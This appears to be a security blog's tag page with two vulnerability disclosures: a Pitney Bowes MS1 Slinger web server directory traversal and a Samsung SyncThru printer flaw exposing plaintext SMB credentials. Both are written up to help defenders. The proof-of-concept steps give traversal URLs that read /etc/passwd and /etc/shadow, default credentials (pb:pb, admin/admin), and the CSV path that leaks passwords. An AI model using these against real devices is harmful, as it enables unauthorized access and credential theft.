0day

All posts tagged 0day

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and twitter we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was when we found out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb

About a year ago during a network penetration test I found an information disclosure vulnerability in a Samsung printer. The disclosure was fairly serious; NTLM hashes for any network accounts were stored in a CSV file. I’m not a web application penetration tester but luckily the connection was slow enough that I watched the page load briefly then redirect to the next page. This definitely highlights the importance of manually testing.

Because this has been responsibly disclosed and patched it isn’t technically an 0day.

The firmware fixing the vulnerability was released over six months ago and I didn’t want to publish any vulnerability information irresponsibly.  The following is the information submitted to Samsung and links to the updated firmware. Updating any Samsung printers is important. Equally important is adding printers and other peripheral devices to your patching program.


SyncThru Web SMB Password Disclosure

Known Vulnerable Versions
Samsung SCX-5835_5935 Series Printer
Main Firmware Version :  2.01.00.26
Network Firmware Version :  V4.01.05(SCX-5835/5935) 12-22-2008
Engine Firmware Version :  1.20.73
UI Firmware Version :  V1.03.01.55 07-13-2009
Finisher Firmware Version :  Not Installed
PCL5E Firmware Version : PCL5e 5.87 11-07-2008
PCL6 Firmware Version : PCL6 5.86 10-28-2008
PostScript Firmware Version : PS3 V1.93.06 12-19-2008
SPL Firmware Version : SPL 5.32 01-03-2008
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
Samsung SCX-5635 Series
Main Firmware Version :     2.01.01.18 12-08-2009
Network Firmware Version :     V4.01.16(SCX-5635) 12-04-2009
Engine Firmware Version :     1.31.32
PCL5E Firmware Version :    PCL5e 5.92 02-12-2009
PCL6 Firmware Version :    PCL6 5.93 03-21-2009
PostScript Firmware Version :    PS3 1.94.06 12-22-2008
TIFF Firmware Version :    TIFF 0.91.00 10-07-2008

Proof of Concept

  1. This procedure does not seem to work using Internet Explorer 7 but behaves as expected with Firefox 4.0.1.
  2. Using the default username and password (admin/admin), it is possible to obtain all credentials used for SMB file transfer. To obtain the file access     http://<printer url>/smb_serverList.csv
  3. The UserName and UserPassword fields are unencrypted and visible using any text editor.

Links to Updated Firmware
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX5635_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX5835_5935_V2.01.00.56_0401113_1.01.zip

Acknowledgements
Samsung security and I had a few miscommunications and I chose to hold off on releasing this until I knew that a patch was available. When I inquired again they immediately rectified the situation.

Contact security@samsung.com if you happen to find any additional vulnerabilities.